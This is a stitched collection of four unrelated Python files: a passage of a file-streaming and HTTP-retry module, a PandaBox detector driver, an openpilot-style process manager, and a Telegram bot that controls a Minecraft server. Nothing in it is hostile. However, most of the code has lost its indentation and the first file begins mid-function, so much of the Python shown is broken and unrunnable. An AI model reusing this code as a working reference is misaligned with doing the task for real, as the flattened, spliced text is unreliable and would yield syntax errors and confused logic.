for line in lines:
if line.startswith("\r"):
found = False
for i in range(len(ret) - 1, -1, -1):
if ret[i].startswith("ERROR ") == is_err:
ret[i] = prefix + line[1:] + "\n"
found = True
break
if not found:
if flag:
flag = False
prev_ret = self._prev_chunk["content"]
for i in range(len(prev_ret) - 1, -1, -1):
if prev_ret[i].startswith("ERROR ") == is_err:
prev_ret[i] = prefix + line[1:] + "\n"
found = True
break
if found:
chunk_id = self._prev_chunk["offset"]
ret = prev_ret + ret
else:
ret.append(prefix + line[1:] + "\n")
else:
ret.append(prefix + line[1:] + "\n")
elif line:
ret.append(prefix + line + "\n")
self._chunk_id = chunk_id + len(ret)
ret = {"offset": chunk_id, "content": ret}
self._prev_chunk = ret
return ret
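# Illustrative sketch (not part of the original module): how CRDedupeFilePolicy
# collapses carriage-return progress updates. The timestamp is made up and the
# result assumes a POSIX os.linesep of "\n"; the function is never called here.
def _demo_cr_dedupe():
    policy = CRDedupeFilePolicy()
    chunk = Chunk(
        "output.log",
        "2020-08-25T20:38:36.895321 progress 10%\n\rprogress 50%\n\rprogress 100%\n",
    )
    # Only the final "progress 100%" line survives, mirroring a terminal display.
    return policy.process_chunks([chunk])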
class BinaryFilePolicy(DefaultFilePolicy):
    def __init__(self, start_chunk_id=0):
        super(BinaryFilePolicy, self).__init__(start_chunk_id=start_chunk_id)
        # byte offset into the stream; DefaultFilePolicy only tracks a chunk id
        self._offset = 0
    def process_chunks(self, chunks):
        data = b"".join([c.data for c in chunks])
        enc = base64.b64encode(data).decode("ascii")
        # report the starting byte offset, consistent with the other policies
        offset = self._offset
        self._offset += len(data)
        return {"offset": offset, "content": enc, "encoding": "base64"}
class FileStreamApi(object):
"""Pushes chunks of files to our streaming endpoint.
This class is used as a singleton. It has a thread that serializes access to
the streaming endpoint and performs rate-limiting and batching.
TODO: Differentiate between binary/text encoding.
"""
Finish = collections.namedtuple("Finish", ("exitcode"))
Preempting = collections.namedtuple("Preempting", ())
PushSuccess = collections.namedtuple("PushSuccess", ("artifact_id", "save_name"))
HTTP_TIMEOUT = env.get_http_timeout(10)
MAX_ITEMS_PER_PUSH = 10000
def __init__(self, api, run_id, start_time, settings=None):
if settings is None:
settings = dict()
# NOTE: exc_info is set in thread_except_body context and readable by calling threads
self._exc_info = None
self._settings = settings
self._api = api
self._run_id = run_id
self._start_time = start_time
self._client = requests.Session()
self._client.auth = ("api", api.api_key)
self._client.timeout = self.HTTP_TIMEOUT
self._client.headers.update(
{
"User-Agent": api.user_agent,
"X-WANDB-USERNAME": env.get_username(),
"X-WANDB-USER-EMAIL": env.get_user_email(),
}
)
self._file_policies = {}
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_except_body)
# It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which
# cleans this thread up.
self._thread.name = "FileStreamThread"
self._thread.daemon = True
self._init_endpoint()
def _init_endpoint(self):
settings = self._api.settings()
settings.update(self._settings)
self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format(
base=settings["base_url"],
entity=settings["entity"],
project=settings["project"],
run=self._run_id,
)
def start(self):
self._init_endpoint()
self._thread.start()
def set_default_file_policy(self, filename, file_policy):
"""Set an upload policy for a file unless one has already been set.
"""
if filename not in self._file_policies:
self._file_policies[filename] = file_policy
def set_file_policy(self, filename, file_policy):
self._file_policies[filename] = file_policy
@property
def heartbeat_seconds(self):
# Defaults to 30
return self._api.dynamic_settings["heartbeat_seconds"]
def rate_limit_seconds(self):
run_time = time.time() - self._start_time
if run_time < 60:
return max(1, self.heartbeat_seconds / 15)
elif run_time < 300:
return max(2.5, self.heartbeat_seconds / 3)
else:
return max(5, self.heartbeat_seconds)
def _read_queue(self):
# called from the push thread (_thread_body), this does an initial read
# that'll block for up to rate_limit_seconds. Then it tries to read
# as much out of the queue as it can. We do this because the http post
# to the server happens within _thread_body, and can take longer than
# our rate limit. So next time we get a chance to read the queue we want
        # to read all the stuff that queued up since last time.
#
# If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread
# will get behind and data will buffer up in the queue.
return util.read_many_from_queue(
self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds()
)
def _thread_body(self):
posted_data_time = time.time()
posted_anything_time = time.time()
ready_chunks = []
uploaded = set()
finished = None
while finished is None:
items = self._read_queue()
for item in items:
if isinstance(item, self.Finish):
finished = item
elif isinstance(item, self.Preempting):
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": False,
"preempting": True,
"uploaded": list(uploaded),
},
)
uploaded = set()
elif isinstance(item, self.PushSuccess):
uploaded.add(item.save_name)
else:
# item is Chunk
ready_chunks.append(item)
cur_time = time.time()
if ready_chunks and (
finished or cur_time - posted_data_time > self.rate_limit_seconds()
):
posted_data_time = cur_time
posted_anything_time = cur_time
self._send(ready_chunks)
ready_chunks = []
if cur_time - posted_anything_time > self.heartbeat_seconds:
posted_anything_time = cur_time
self._handle_response(
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": False,
"failed": False,
"uploaded": list(uploaded),
},
)
)
uploaded = set()
        # post the final close message. (finished is a self.Finish instance now)
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": True,
"exitcode": int(finished.exitcode),
"uploaded": list(uploaded),
},
)
def _thread_except_body(self):
# TODO: Consolidate with internal_util.ExceptionThread
try:
self._thread_body()
except Exception as e:
exc_info = sys.exc_info()
self._exc_info = exc_info
logger.exception("generic exception in filestream thread")
util.sentry_exc(exc_info, delay=True)
raise e
def _handle_response(self, response):
"""Logs dropped chunks and updates dynamic settings"""
if isinstance(response, Exception):
wandb.termerror("Droppped streaming file chunk (see wandb/debug.log)")
logging.error("dropped chunk %s" % response)
raise response
else:
parsed: dict = None
try:
parsed = response.json()
except Exception:
pass
if isinstance(parsed, dict):
limits = parsed.get("limits")
if isinstance(limits, dict):
self._api.dynamic_settings.update(limits)
def _send(self, chunks):
# create files dict. dict of <filename: chunks> pairs where chunks is a list of
# [chunk_id, chunk_data] tuples (as lists since this will be json).
files = {}
# Groupby needs group keys to be consecutive, so sort first.
chunks.sort(key=lambda c: c.filename)
for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename):
file_chunks = list(file_chunks) # groupby returns iterator
# Specific file policies are set by internal/sender.py
self.set_default_file_policy(filename, DefaultFilePolicy())
files[filename] = self._file_policies[filename].process_chunks(file_chunks)
if not files[filename]:
del files[filename]
for fs in file_stream_utils.split_files(files, max_mb=10):
self._handle_response(
request_with_retry(
self._client.post,
self._endpoint,
json={"files": fs},
retry_callback=self._api.retry_callback,
)
)
def stream_file(self, path):
name = path.split("/")[-1]
with open(path) as f:
self._send([Chunk(name, line) for line in f])
def enqueue_preempting(self):
self._queue.put(self.Preempting())
def push(self, filename, data):
"""Push a chunk of a file to the streaming endpoint.
Arguments:
filename: Name of file that this is a chunk of.
            data: File data.
"""
self._queue.put(Chunk(filename, data))
def push_success(self, artifact_id, save_name):
"""Notification that a file upload has been successfully completed
Arguments:
artifact_id: ID of artifact
save_name: saved name of the uploaded file
"""
self._queue.put(self.PushSuccess(artifact_id, save_name))
def finish(self, exitcode):
"""Cleans up.
Anything pushed after finish will be dropped.
Arguments:
exitcode: The exitcode of the watched process.
"""
self._queue.put(self.Finish(exitcode))
# TODO(jhr): join on a thread which exited with an exception is a noop, clean up this path
self._thread.join()
if self._exc_info:
logger.error("FileStream exception", exc_info=self._exc_info)
# reraising the original exception, will get recaught in internal.py for the sender thread
six.reraise(*self._exc_info)
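# Illustrative lifecycle sketch (not part of the original module): how a caller
# might drive FileStreamApi. The `api` object and run id are placeholders and
# the function is never invoked here.
def _demo_file_stream_usage(api):
    fs = FileStreamApi(api, run_id="example-run", start_time=time.time())
    fs.set_file_policy("output.log", CRDedupeFilePolicy())
    fs.start()
    fs.push("output.log", "2020-08-25T20:38:36.895321 hello world\n")
    fs.finish(exitcode=0)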
MAX_SLEEP_SECONDS = 60 * 5
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Arguments:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop("max_retries", 30)
retry_callback = kwargs.pop("retry_callback", None)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (
requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout,
) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if e.response is not None and e.response.status_code in {
400,
403,
404,
409,
}:
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and (
e.response is not None and e.response.status_code == 429
):
err_str = "Filestream rate limit exceeded, retrying in {} seconds".format(
delay
)
if retry_callback:
retry_callback(e.response.status_code, err_str)
logger.info(err_str)
else:
pass
logger.warning(
"requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s",
e,
func,
args,
kwargs,
)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
except requests.exceptions.RequestException as e:
error_message = "unknown error"
try:
error_message = response.json()["error"] # XXX clean this up
except Exception:
pass
logger.error("requests_with_retry error: {}".format(error_message))
logger.exception(
"requests_with_retry encountered unretryable exception: %s", e
)
return e
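# Illustrative usage sketch (not part of the original module): posting a payload
# through request_with_retry with a rate-limit callback. The endpoint is a
# placeholder and the function is never called here.
def _demo_request_with_retry(session, endpoint):
    return request_with_retry(
        session.post,
        endpoint,
        json={"complete": False, "failed": False},
        retry_callback=lambda status, msg: logger.info("retry (%s): %s", status, msg),
    )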
|
PandaBox.py
|
from .Detector import Detector, TriggeredDetector, BurstDetector
from ..environment import env
import time
import numpy as np
import socket
from threading import Thread
import select
SOCK_RECV = 4096
RECV_DELAY = 1e-4
class PandaBox(Detector, TriggeredDetector, BurstDetector):
"""
Basic class for treating a PandaBox as a detector, capable
of operating in burst mode (thereby acting as a time-based
trigger source).
The PandaBox is infinitely configurable, and this class assumes that:
#. the PCAP block is used,
#. the PULSE1 block is used to control the number of
acquired points and their timing, and
#. flickering the "A" bit causes a trigger.
"""
def __init__(self, name=None, host='172.16.126.101',
ctrl_port=8888, data_port=8889, bitblock='BITS1'):
self.host = host
self.ctrl_port = ctrl_port
self.data_port = data_port
self.acqthread = None
self.burst_latency = .003
self.bitblock = bitblock
Detector.__init__(self, name=name)
TriggeredDetector.__init__(self)
BurstDetector.__init__(self)
def initialize(self):
self.ctrl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ctrl_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.ctrl_sock.settimeout(1)
self.ctrl_sock.connect((self.host, self.ctrl_port))
def query(self, cmd):
self.ctrl_sock.sendall(bytes(cmd + '\n', 'ascii'))
return self.ctrl_sock.recv(SOCK_RECV).decode()
def busy(self):
if self.acqthread and self.acqthread.is_alive():
return True
else:
return False
def prepare(self, acqtime, dataid, n_starts):
BurstDetector.prepare(self, acqtime, dataid, n_starts)
self.query('PULSE1.PULSES=%d' % self.burst_n)
self.query('PULSE1.WIDTH=%f' % self.acqtime)
self.query('PULSE1.STEP=%f' % (self.burst_latency + self.acqtime))
def arm(self):
self.acqthread = Thread(target=self._acquire)
self.acqthread.start()
self.query('*PCAP.ARM=')
done = False
while not done:
ret = self.query('*PCAP.COMPLETION?')
if 'Busy' in ret:
done = True
time.sleep(.005)
time.sleep(.05) # necessary hack
def _acquire(self):
"""
Receive and parse one set of measurements.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.data_port))
s.send(b'\n\n')
# First wait for the header to be complete, and parse it.
done = False
buff = b''
while not done:
buff += s.recv(SOCK_RECV)
if b'\n\n' in buff:
done = True
header, buff = buff.split(b'\n\n')
channels = []
for line in header.split(b'fields:\n')[-1].split(b'\n'):
ch = line.strip().split()[0].decode()
op = line.strip().split()[2].decode()
channels.append(ch + '_' + op)
# Then put the rest of the data into the same buffer and continue
n = 0
data = {ch: [] for ch in channels}
num_points = self.hw_trig_n * self.burst_n
while n < num_points:
# anything more to read?
ready = select.select([s], [], [], RECV_DELAY)[0]
if ready:
buff += s.recv(SOCK_RECV)
# anything more to parse?
if b'\n' in buff:
line, buff = buff.split(b'\n', 1)
vals = line.strip().split()
for k, v in zip(channels, vals):
if b'END' in v:
data[k].append(None)
n = num_points
break
data[k].append(float(v))
n += 1
for k, v in data.items():
data[k] = np.array(v)
self.data = data
self.query('*PCAP.DISARM=')
def start(self):
if not self.hw_trig:
self.query('%s.A=1' % self.bitblock)
time.sleep(0.001)
self.query('%s.A=0' % self.bitblock)
def stop(self):
self.query('*PCAP.DISARM=')
def read(self):
return self.data
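# Illustrative acquisition sequence (not part of the original module): how a
# caller might drive a PandaBox in burst mode. The acquisition parameters are
# made up and the function is never called here.
def _demo_pandabox_burst(acqtime=0.01, n_starts=1):
    panda = PandaBox(name='demo_panda')
    panda.initialize()
    panda.prepare(acqtime, dataid=None, n_starts=n_starts)
    panda.arm()
    panda.start()
    while panda.busy():
        time.sleep(0.01)
    return panda.read()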
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from common.op_params import opParams
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
KILL_UPDATED = opParams().get('update_behavior').lower().strip() == 'off' or os.path.exists('/data/no_ota_updates')
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
# shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
# shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
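# Note (inferred from the code above rather than documented here): build() relies
# on the SConstruct emitting "progress: <node count>" lines on stderr when
# SCONS_PROGRESS=1 is set, which is what drives the spinner percentage.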
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
# "lanespeedd": "selfdrive.controls.lib.lane_speed",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
# 'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if not KILL_UPDATED:
persistent_processes.append('updated')
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
# 'lanespeedd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
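# Illustrative usage (not part of upstream): a fork could register an extra
# managed python process like this; the name and module path are made up.
#   register_managed_process("mapd", "selfdrive.mapd.mapd", car_started=True)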
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
spinner.close()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
run_all = False
if msg.deviceState.started or run_all:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
prepare_managed_process(p)
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
bot.py
|
import telebot
import subprocess
import json
import os
from threading import Thread, Lock
from queue import Queue, Empty
process = None
q = None
t = None
cwd = os.path.dirname(os.path.realpath(__file__))
config_path = os.path.join(cwd,'config.json')
with open(config_path) as configFile:
config = json.load(configFile)
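# For reference (not part of the original script), config.json is expected to
# provide at least the keys used below; the values here are placeholders:
# {
#   "bot-token": "<telegram bot token>",
#   "whitelist": ["<telegram username>"],
#   "args": ["-Xmx2G"],
#   "server-directory": "/path/to/minecraft/server",
#   "jar-name": "server.jar"
# }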
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
def out_log():
out = []
decodeLine = True
while decodeLine:
try:
line = q.get_nowait()
except Empty:
decodeLine=False
else:
out.append(line.decode().replace('[Server thread/INFO]',''))
return out
bot = telebot.TeleBot(config["bot-token"])
@bot.message_handler(commands=['start' ,'s'])
def start_server(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Starting Minecraft Server...")
args = config['args']
serverDir = config['server-directory']
jarName = config['jar-name']
process = subprocess.Popen(['java', *args , '-jar' , jarName , 'nogui'],stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE , cwd=serverDir)
q = Queue()
t = Thread(target=enqueue_output, args=(process.stdout, q))
t.daemon = True
t.start()
else:
bot.reply_to(message, "the server is already up tyoe /output to view the stdout or /stop to stop the server")
except Exception as e:
print('Error in start ' + str(e))
@bot.message_handler(commands=['stop'])
def stop_server(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
if not process.stdin.closed:
process.stdin.write(b'stop\n')
process.stdin.flush()
process.communicate()
process.terminate()
process = None
t = None
q = None
bot.reply_to(message, 'Server Stopped, type /start to start the server')
except Exception as e:
print('Error in stop ' + str(e))
